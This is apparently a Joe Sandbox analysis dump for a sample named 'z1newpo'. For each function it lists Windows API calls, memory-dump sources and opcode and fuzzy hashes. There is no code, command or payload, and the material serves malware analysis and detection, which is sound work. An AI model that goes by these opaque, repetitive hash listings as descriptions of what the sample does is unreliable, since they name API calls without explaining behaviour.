                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                    • __freefls@4.LIBCMT ref: 00415209
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                    • String ID:
                                                    • API String ID: 442100245-0
                                                    • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                    • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                    • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                    • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                    APIs
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                    • _wcslen.LIBCMT ref: 0045F94A
                                                    • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                    • String ID: 0
                                                    • API String ID: 621800784-4108050209
                                                    • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                    • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                    • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                    • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • SetErrorMode.KERNEL32 ref: 004781CE
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                    • SetErrorMode.KERNEL32(?), ref: 00478270
                                                    • SetErrorMode.KERNEL32(?), ref: 00478340
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                    • String ID: \VH
                                                    • API String ID: 3884216118-234962358
                                                    • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                    • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                    • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                    • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                    • IsMenu.USER32(?), ref: 0044854D
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                    • DrawMenuBar.USER32 ref: 004485AF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert
                                                    • String ID: 0
                                                    • API String ID: 3076010158-4108050209
                                                    • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                    • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                    • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                    • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                    • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_memmove_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1589278365-1403004172
                                                    • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                    • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                    • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                    • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Handle
                                                    • String ID: nul
                                                    • API String ID: 2519475695-2873401336
                                                    • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                    • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                    • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                    • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Handle
                                                    • String ID: nul
                                                    • API String ID: 2519475695-2873401336
                                                    • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                    • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                    • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                    • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: SysAnimate32
                                                    • API String ID: 0-1011021900
                                                    • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                    • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                    • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                    • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                    APIs
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                      • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                      • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                      • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                    • GetFocus.USER32 ref: 0046157B
                                                      • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                      • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                    • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                    • __swprintf.LIBCMT ref: 00461608
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                    • String ID: %s%d
                                                    • API String ID: 2645982514-1110647743
                                                    • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                    • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                    • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                    • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    APIs
                                                    • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                    • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                    Similarity
                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                    • String ID:
                                                    • API String ID: 3488606520-0
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                    Similarity
                                                    • API ID: ConnectRegistry_memmove_wcslen
                                                    • String ID:
                                                    • API String ID: 15295421-0
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                    • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                    • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                    Similarity
                                                    • API ID: AddressProc$Library$FreeLoad
                                                    • String ID:
                                                    • API String ID: 2449869053-0
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 004563A6
                                                    • ScreenToClient.USER32(?,?), ref: 004563C3
                                                    • GetAsyncKeyState.USER32(?), ref: 00456400
                                                    • GetAsyncKeyState.USER32(?), ref: 00456410
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorLongScreenWindow
                                                    • String ID:
                                                    • API String ID: 3539004672-0
                                                    APIs
                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                    • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                    Similarity
                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                    • String ID:
                                                    • API String ID: 327565842-0
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                    • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String
                                                    • String ID:
                                                    • API String ID: 2832842796-0
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                    • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                    Similarity
                                                    • API ID: Enum$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 2095303065-0
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00436A24
                                                    Similarity
                                                    • API ID: RectWindow
                                                    • String ID:
                                                    • API String ID: 861336768-0
                                                    APIs
                                                    • SendMessageW.USER32 ref: 00449598
                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                    • _wcslen.LIBCMT ref: 0044960D
                                                    • _wcslen.LIBCMT ref: 0044961A
                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                    Similarity
                                                    • API ID: MessageSend$_wcslen$_wcspbrk
                                                    • String ID:
                                                    • API String ID: 1856069659-0
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 004478E2
                                                    • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                    • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                    • GetCursorPos.USER32(00000000), ref: 0044796A
                                                    • TrackPopupMenuEx.USER32(016A6500,00000000,00000000,?,?,00000000), ref: 00447991
                                                    Similarity
                                                    • API ID: CursorMenuPopupTrack$Proc
                                                    • String ID:
                                                    • API String ID: 1300944170-0
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 004479CC
                                                    • GetCursorPos.USER32(?), ref: 004479D7
                                                    • ScreenToClient.USER32(?,?), ref: 004479F3
                                                    • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                    • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                    Similarity
                                                    • API ID: Client$CursorFromPointProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 1822080540-0
                                                    • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                    • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                    • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                    • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                    • String ID:
                                                    • API String ID: 659298297-0
                                                    • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                    • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                    • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                    • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                    APIs
                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                      • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                      • Part of subcall function 00440D98: SendMessageW.USER32(016A1C20,000000F1,00000000,00000000), ref: 00440E6E
                                                      • Part of subcall function 00440D98: SendMessageW.USER32(016A1C20,000000F1,00000001,00000000), ref: 00440E9A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$EnableMessageSend$LongShow
                                                    • String ID:
                                                    • API String ID: 142311417-0
                                                    • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                    • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                    • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                    • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
